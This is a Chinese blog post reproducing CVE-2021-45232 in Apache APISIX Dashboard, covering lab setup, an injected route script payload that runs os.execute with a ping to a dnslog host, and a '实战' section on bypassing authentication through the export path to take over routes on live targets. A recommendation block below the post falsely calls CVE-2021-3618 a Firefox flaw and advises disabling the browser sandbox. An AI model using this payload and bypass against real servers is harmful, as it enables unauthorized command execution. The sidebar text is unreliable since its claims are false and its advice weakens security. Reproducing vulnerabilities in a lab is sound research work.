CVE-2021-45232 Apache APISIX Dashboard RCE漏洞复现

0x00 前言

之前出了一期Apache APISIX Dashboard风险提示的文章,今天来复现一个这个漏洞

--学如逆水行舟,不进则退

0x01 漏洞简介

Apache APISIX 是一个动态、实时、高性能的 API 网关, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。

该漏洞的存在是由于 Manager API 中的错误。Manager API 在 gin 框架的基础上引入了 droplet 框架,所有的 API 和鉴权中间件都是基于 droplet 框架开发的。但是有些 API 直接使用了框架 gin 的接口,从而绕过身份验证。

0x02 影响版本

APISIX Dashboard<2.10.1

安全的版本:2.10.1

0x03 环境搭建

1.环境搭建(这里使用github上的环境,使用以下命令进行克隆)

git clone https://github.com/apache/apisix-docker        //克隆
cd apisix-docker/example/           、、进去到目录下
vim docker-compose.yml     //修改版本号

 2.修改的地方如下

 

3.修改完成之后,使用以下命令启动

docker-compose up -d

4.启动成功访问ip:9000出现以下图片,说明搭建成功

 

 0x04 漏洞复现

1.使用admin,admin默认密码登入后台,创建一个上游,如下图

 2.上游的名称随便写,主机名,端口也随便写,然后一直点下一步,点击提交

 3.创建好上游之后,再创建一个路由

4.创建路由时,只需把选择上游服务选择为上面的创造的上游,即可一直点下一步,直到提交完成

,路由创建好之后,点击 如下图配置处

5.点击配置之后,一直点下一步,在最后点提交的时候,进行抓包,插入以下字段

"script":"os.execute('ping dnslog地址')",,如下图(ping后面为dnslog地址)

 6.修改放包之后,在路由的最右侧有个更多,点击更多-查看-,会发现已经覆盖为我们的命令

7.访问ip:8090/test,会执行,发现dnslog有回显,说明可以命令执行

 0x05 实战如何操作

 上面为漏洞复现,具体实战,弱口令进不去的情况下,可以进行路径拼接,绕过身份验证下载路由等信息,然后通过抓包,利用下载的路由信息文件里的信息,构造payload,覆盖路由配置,也就是说覆盖为我们要执行的命令,之后和上面一样,访问路由,即可命令执行成功

拼接路径为: /apisix/admin/migrate/export ,如下图

    

 拼接路径之后,下载的文件即为我们之前漏洞复现时,路由以及上游的信息。

可以通过下载到的信息,构造如漏洞复现时的payload进行命令执行

实战构造payload注意点:::  1."script":"os.execute('ping dnslog地址')",这个payload可以不变

2.只需要把下载文件中的信息在bp中写入,然后结合payload发包,即可执行

修改的结构如下

 0x06 修复建议

1.升级到安全版本

     下载链接:Releases · apache/apisix-dashboard · GitHub

2.修改默认账户的账号密码,或通过白名单的方式限制访问的源IP

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
CVE-2021-3618漏洞是指影响了Mozilla Firefox浏览器的一个安全漏洞。该漏洞复现步骤如下: 1. 首先,你需要安装最新版本的Mozilla Firefox浏览器。确保你的浏览器已经更新到最新版本,因为最新版本通常会修复已知的漏洞。 2. 在Firefox浏览器中,打开一个新的标签页,并输入“about:config”(不包括引号)并按下Enter键。这将打开Firefox的高级配置页面。 3. 在搜索栏中输入“security.sandbox.content.level”(不包括引号),然后按下Enter键。你将看到一个名为“security.sandbox.content.level”的首选项。 4. 将“security.sandbox.content.level”的值更改为“0”(不包括引号)。这将禁用Firefox的内容沙箱。请注意,这将降低浏览器的安全性,请谨慎操作。 5. 关闭并重新启动Firefox浏览器,使更改生效。 6. 现在,你可以尝试复现CVE-2021-3618漏洞。使用Firefox浏览器访问一个存在安全漏洞的网站,如已知的恶意或受攻击的网站,或使用特定的payload触发漏洞。 7. 如果复现成功,可能会出现安全漏洞所导致的异常行为,比如系统崩溃、恶意代码执行等。如果没有出现异常行为,可能是因为已经修复了该漏洞或在你的环境中无法成功利用。 需要注意的是,复现CVE漏洞可能存在风险,并可能对你的计算机造成不可逆转的损害。这种操作只适用于在合法情况下进行安全测试和研究的专业人士,不推荐普通用户进行尝试。实施复现操作之前,请确认你已经了解并接受相关风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

种树人1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值